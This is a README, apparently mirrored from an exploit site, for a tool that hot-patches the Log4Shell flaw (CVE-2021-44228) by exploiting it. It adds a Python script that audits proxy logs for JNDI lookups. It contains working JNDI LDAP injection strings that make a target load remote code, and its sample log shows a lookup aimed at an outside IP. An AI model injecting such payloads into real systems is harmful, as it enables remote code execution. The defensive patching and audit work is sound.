## https://sploitus.com/exploit?id=8D0CF3A6-EC3F-536C-A424-08879FF2F158
# cve-2021-44228-qingteng-online-patch 

## What is this

Hot-patch CVE-2021-44228 by exploiting the vulnerability itself.

## How to use

Inject the following code anywhere that is likely vulnerable to CVE-2021-44228:
```
${jndi:ldap://your-own-server/patch}
```

To prevent a MITM attack during the patch process, the following payload is recommended, although it is less compatible with older versions of Java:
```
${jndi:ldap://your-own-server/any_string_except_patch}
```
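
To keep track of a patch run, the raw request logs of a front-end proxy can be checked for which lookup each backend received and whether any lookup pointed at a server that is not yours. The following is an added example, not part of this project; the server name `patch.internal.example`, the log layout and the function `audit` are assumptions, and it matches only the literal payload form shown above.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Assumption: hostname of the patch server you run (placeholder value).
PATCH_SERVER = "patch.internal.example"

# Matches only the literal form shown in the README, not nested-lookup variants.
JNDI_RE = re.compile(r"\$\{jndi:(ldap://[^}\s]+)\}", re.IGNORECASE)

# Constructed proxy log lines, assumed layout: "<backend-host> <raw request fields>".
SAMPLE_LOG = """\
app01 GET /search ua=${jndi:ldap://patch.internal.example/patch}
app02 GET /login ua=${jndi:ldap://patch.internal.example/h7f3}
app03 GET / ua=${jndi:ldap://198.51.100.7:1389/a}
app04 GET /health ua=curl/7.79
"""


def audit(log_text, patch_server=PATCH_SERVER):
    """Group backend hosts by what the logged JNDI lookup pointed at."""
    report = defaultdict(set)
    for line in log_text.splitlines():
        app_host, _, message = line.partition(" ")
        for url in JNDI_RE.findall(message):
            parts = urlsplit(url)
            if (parts.hostname or "").lower() != patch_server:
                # Lookup names another server: not part of your patch run.
                report["foreign"].add(app_host)
            elif parts.path.strip("/") == "patch":
                # First payload in the README (wider Java compatibility).
                report["patch_compat"].add(app_host)
            else:
                # Second payload in the README (any path other than "patch").
                report["patch_recommended"].add(app_host)
    return {bucket: sorted(hosts) for bucket, hosts in report.items()}


if __name__ == "__main__":
    for bucket, hosts in audit(SAMPLE_LOG).items():
        print(bucket, hosts)
```

Hosts in the `foreign` bucket received a lookup that names a server other than the configured patch server and need separate investigation.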

## Run your own server

1. Download the latest [releases](https://github.com/qingtengyun/cve-2021-44228-qingteng-online-patch/releases)

2. Specify the system environment variables `LOG4J_HOTFIX_HTTP_PATH` and `LOG4J_HOTFIX_HTTPS_PATH` if you want to host `Hotfix.class` on your own server.

## Build

Please note that `Hotfix.java` should be compiled with JDK 6 for maximum compatibility.